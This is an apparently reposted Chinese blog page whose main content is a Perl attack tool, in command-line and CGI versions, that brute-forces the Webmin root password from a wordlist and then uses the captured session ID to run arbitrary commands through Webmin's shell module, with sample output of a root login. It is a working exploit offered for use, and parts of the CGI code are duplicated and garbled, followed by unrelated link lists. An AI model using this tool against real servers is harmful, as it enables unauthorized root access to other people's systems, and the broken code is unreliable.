Webmin 暴力破解+ 執行命令(轉)
Webmin 暴力破解+ 執行命令(轉)[@more@]Webmin是一個廣泛使用的,執行在linux/unix下,用瀏覽器來管理系統的工具。用它,你不必知道複雜的命令列,也不用瞭解各種複雜的配置檔案,系統管理變得非常簡單!可以設定帳號,配置DNS和檔案共享等. Webmin BruteForce + Command execution v1.5 #!/usr/bin/perl ################################################################################ # Webmin BruteForce + Command execution # v1.0:By Di42lo - "> # v1.5:By ZzagorR - - ################################################################################ #add script: #1.wordlist func. #2.log (line:41) ################################################################################ # usage: # ./webmin1.pl #./webmin1.pl 192.168.0.5 "uptime" wordlist.txt # [+] BruteForcing... # [+] trying to enter with: admim # [+] trying to enter with: admin # [+] Found SID : f3231ff32849fa0c8c98487ba8c09dbb # [+] Password : admin # [+] Connecting to host once again # [+] Connected.. Sending Buffer # [+] Buffer sent...running command uptime # root logged into Webmin 1.170 on linux (SuSE Linux 9.1) # 10:55pm up 23 days 9:03, 1 user, load average: 0.20, 0.05, 0.01 ################################################################################ use IO::Socket; if (@ARGV<3){ print "Webmin BruteForcer v1.5
"; print "usage:
"; print " webmin15.pl
"; print "example:
"; print " webmin15.pl "id" wordlist.txt
"; exit; } my $host=$ARGV[0]; my $cmd=$ARGV[1]; my $wlist=$ARGV[2]; open (data, "$wlist"); @wordlist=; close data; $passx=@wordlist; open(results , ">$host.log"); print results "#############################
"; print results "Webmin BruteForce + Command execution v1.5
"; print results "Host:$host
"; print results "#############################
"; my $chk=0; my $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort => "10000",Timeout => 10); if(!$sock){ print "[-] Webmin on this host does not exist
"; print results "[-] Webmin on this host does not exist
"; exit; }else{ $sock->close; print "[+] BruteForcing...
"; } my $sid; $n=0; while ($chk!=1) { $n++; if($n>$passx){ exit; } $pass=@wordlist[$passx-$n]; my $pass_line="page=%2F&user=root&pass=$pass"; my $buffer="POST /session_login.cgi HTTP/1.0
". "Host: $host:10000
". "Keep-Alive: 300
". "Connection: keep-alive
". "Referer:
". "Cookie: testing=1
". "Content-Type: application/x-www-form-urlencoded
". "Content-Length: __
". "
". $pass_line."
"; my $line_size=length($pass_line); $buffer=~s/__/$line_size/g; my $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort => "10000",Timeout => 10); if ($sock){ print "[+] trying to enter with: $pass
"; print $sock $buffer; while ($answer=){ if ($answer=~/sid=(.*);/g){ $chk=1; $sid=$1; print "[+] Found SID : $sid
"; print "[+] Password : $pass
"; print results "[+]:Password:$pass
Sid:$sid
"; } } } $sock->close; print results "[-]$pass
"; } print "[+] Connecting to host once again
"; $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort => "10000",Timeout => 10); if(!$sock){ print "[-] Cant Connect once again for command execution
"; print results "[-] Cant Connect once again for command execution
"; } print "[+] Connected.. Sending Buffer
"; my $temp="-----------------------------19777347561180971495777867604
". "Content-Disposition: form-data; name="cmd"
". "
". "$cmd
". "-----------------------------19777347561180971495777867604
". "Content-Disposition: form-data; name="pwd"
". "
". "/root
". "-----------------------------19777347561180971495777867604
". "Content-Disposition: form-data; name="history"
". "
". "
". "-----------------------------19777347561180971495777867604
". "Content-Disposition: form-data; name="previous"
". "
". "$cmd
". "-----------------------------19777347561180971495777867604
". "Content-Disposition: form-data; name="pcmd"
". "
". "$cmd
". "-----------------------------19777347561180971495777867604--
"; my $buffer_size=length($temp); $buffer="POST /shell/index.cgi HTTP/1.1
". "Host: $host:10000
". "Keep-Alive: 300
". "Connection: keep-alive
". "Referer:
". "Cookie: sid=$sid; testing=1; x
". "Content-Type: multipart/form-data; boundary=---------------------------19777347561180971495777867604
". "Content-Length: siz
". "
". $temp; $buffer=~s/siz/$buffer_size/g; print $sock $buffer; if ($sock){ print "[+] Buffer sent...running command $cmd
"; print $sock $buffer; while ($answer=){ if ($answer=~/defaultStatus="(.*)";/g) { print $1."
";} if ($answer=~/
/g){
exit;
} else {
print $answer;
print results "[+]$answer
";
}
}
}
}
#!/usr/bin/perl
use CGI qw(:standard);
use IO::Socket;
$CGI::HEADERS_ONCE = 1;
$CGI = new CGI;
$atak = $CGI->param("atak");
$host = $CGI->param("host");
$wlist = $CGI->param("wlist");
$cmd = $CGI->param("cmd");
print $CGI->header(-type=>'text/html',-charset=>'windows-1254');
print qq~
Webmin Web Brute Force v1.5 - cgi versiyon
Webmin BruteForce + Command execution- cgi version
v1.0:By Di42lo - Ablo_2@012.net.il
v1.5:By ZzagorR - -
~; if($atak eq "webmin") { open (data, "$wlist"); @wordlist=; close data; $passx=@wordlist; $chk=0; $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort => "10000",Timeout => 25) || die "[-] Webmin on this host does not exist "; $sock->close; print "[+] BruteForcing...
"; $sid; $n=0; while ($chk!=1) { $n++; if($n>$passx){ exit; } $pass=@wordlist[$passx-$n]; $pass_line="page=%2F&user=root&pass=$pass"; $buffer="POST /session_login.cgi HTTP/1.0 ". "Host: $host:10000 ". "Keep-Alive: 300 ". "Connection: keep-alive ". "Referer: ". "Cookie: testing=1 ". "Content-Type: application/x-www-form-urlencoded ". "Content-Length: __ ". " ". $pass_line." "; $line_size=length($pass_line); $buffer=~s/__/$line_size/g; $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort => "10000",Timeout => 25); if ($sock){ print "[+] Denenen sifre: $pass
"; print $sock $buffer; while ($answer=){ if ($answer=~/sid=(.*);/g){ $chk=1; $sid=$1; print "[+] Found SID : $sid
"; print "[+] Sifre : $pass
"; } } } $sock->close; } print "[+] Connecting to host once again
"; $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort => "10000",Timeout => 10) || die "[-] Cant Connect once again for command execution "; print "[+] Connected.. Sending Buffer
"; $temp="-----------------------------19777347561180971495777867604 ". "Content-Disposition: form-data; name="cmd" ". " ". "$cmd ". "-----------------------------19777347561180971495777867604 ". "Content-Disposition: form-data; name="pwd" ". " ". "/root ". "-----------------------------19777347561180971495777867604 ". "Content-Disposition: form-data; name="history" ". " ". " ". "-----------------------------19777347561180971495777867604 ". "Content-Disposition: form-data; name="previous" ". " ". "$cmd ". "-----------------------------19777347561180971495777867604 ". "Content-Disposition: form-data; name="pcmd" ". " ". "$cmd ". "-----------------------------19777347561180971495777867604-- "; $buffer_size=length($temp); $buffer="POST /shell/index.cgi HTTP/1.1 ". "Host: $host:10000 ". "Keep-Alive: 300 ". "Connection: keep-alive ". "Referer: ". "Cookie: sid=$sid; testing=1; x ". "Content-Type: multipart/form-data; boundary=---------------------------19777347561180971495777867604 ". "Content-Length: siz ". " ". $temp; $buffer=~s/siz/$buffer_size/g; print $sock $buffer; if ($sock){ print "[+] Buffer sent...running command $cmd
"; print $sock $buffer; while ($answer=){ if ($answer=~/defaultStatus="(.*)";/g) { print $1."
";} if ($answer=~/ /g){
exit;
} else {
print $answer;
}
}
}
}
}
if($atak eq ""){
print qq~
>/g){ $cmd_chk=1; } if ($cmd_chk==1) { if ($answer=~/
Webmin BruteForce + Command execution- cgi version
v1.0:By Di42lo - Ablo_2@012.net.il
v1.5:By ZzagorR - -
~; if($atak eq "webmin") { open (data, "$wlist"); @wordlist=; close data; $passx=@wordlist; $chk=0; $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort => "10000",Timeout => 25) || die "[-] Webmin on this host does not exist "; $sock->close; print "[+] BruteForcing...
"; $sid; $n=0; while ($chk!=1) { $n++; if($n>$passx){ exit; } $pass=@wordlist[$passx-$n]; $pass_line="page=%2F&user=root&pass=$pass"; $buffer="POST /session_login.cgi HTTP/1.0 ". "Host: $host:10000 ". "Keep-Alive: 300 ". "Connection: keep-alive ". "Referer: ". "Cookie: testing=1 ". "Content-Type: application/x-www-form-urlencoded ". "Content-Length: __ ". " ". $pass_line." "; $line_size=length($pass_line); $buffer=~s/__/$line_size/g; $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort => "10000",Timeout => 25); if ($sock){ print "[+] Denenen sifre: $pass
"; print $sock $buffer; while ($answer=){ if ($answer=~/sid=(.*);/g){ $chk=1; $sid=$1; print "[+] Found SID : $sid
"; print "[+] Sifre : $pass
"; } } } $sock->close; } print "[+] Connecting to host once again
"; $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort => "10000",Timeout => 10) || die "[-] Cant Connect once again for command execution "; print "[+] Connected.. Sending Buffer
"; $temp="-----------------------------19777347561180971495777867604 ". "Content-Disposition: form-data; name="cmd" ". " ". "$cmd ". "-----------------------------19777347561180971495777867604 ". "Content-Disposition: form-data; name="pwd" ". " ". "/root ". "-----------------------------19777347561180971495777867604 ". "Content-Disposition: form-data; name="history" ". " ". " ". "-----------------------------19777347561180971495777867604 ". "Content-Disposition: form-data; name="previous" ". " ". "$cmd ". "-----------------------------19777347561180971495777867604 ". "Content-Disposition: form-data; name="pcmd" ". " ". "$cmd ". "-----------------------------19777347561180971495777867604-- "; $buffer_size=length($temp); $buffer="POST /shell/index.cgi HTTP/1.1 ". "Host: $host:10000 ". "Keep-Alive: 300 ". "Connection: keep-alive ". "Referer: ". "Cookie: sid=$sid; testing=1; x ". "Content-Type: multipart/form-data; boundary=---------------------------19777347561180971495777867604 ". "Content-Length: siz ". " ". $temp; $buffer=~s/siz/$buffer_size/g; print $sock $buffer; if ($sock){ print "[+] Buffer sent...running command $cmd
"; print $sock $buffer; while ($answer=){ if ($answer=~/defaultStatus="(.*)";/g) { print $1."
";} if ($answer=~/
>/g){ $cmd_chk=1; } if ($cmd_chk==1) { if ($answer=~/
相關文章
- oracle中執行os命令(轉)Oracle
- 命令執行漏洞
- Docker執行命令Docker
- Docker命令-docker exec-在執行的容器中執行命令Docker
- .net執行cmd命令
- Java執行cmd命令Java
- 收集 Linux 命令列執行的命令Linux命令列
- 針對執行 Webmin 的 Linux 伺服器出現了新的 Roboto 殭屍網路WebLinux伺服器
- DNS暴力破解工具Fierce常用命令DNS
- python裡執行shell命令或cmd命令Python
- 【Mongo】shell命令列模式執行mongo命令Go命令列模式
- 【安全】【測試思路】基於Burpsuite工具中的intruder執行暴力破解UI
- 監控 redis 執行命令Redis
- Linux 後臺執行命令Linux
- 跟蹤執行命令T
- linux執行環境&命令Linux
- PHP命令執行集錦PHP
- shell指令碼命令 執行python檔案&python命令列執行python程式碼指令碼Python命令列
- 用 PHP 來執行執行網路相關命令PHP
- Golang 使用執行命令帶管道符執行的方法Golang
- Linux基礎命令---間歇執行命令watchLinux
- PhpStrom 優雅執行 Laravel 命令PHPLaravel
- 漏掃工具AWVS命令執行
- PHP命令執行與繞過PHP
- Redis 命令的執行過程Redis
- Java程式執行系統命令Java
- Linux系統執行命令方法Linux
- ctf訓練 命令執行漏洞
- IDEA 執行 XXX 時報錯命令列過長,縮短命令列並重新執行Idea命令列
- 在DOS視窗執行java命令中文顯示正常,執行javac命令中文亂碼Java
- Linux下執行資料泵expdp和impdp命令,字元轉義案例兩則Linux字元
- xcall叢集執行命令指令碼指令碼
- Node.js執行系統命令Node.js
- docker 中vim 命令 無法執行Docker
- python實現批次執行命令列Python命令列
- pwn雜項之linux命令執行Linux
- MacOS 裡執行 sed 命令報錯Mac
- Java審計之命令執行篇Java
- Hadoop系列,執行jar檔案命令HadoopJAR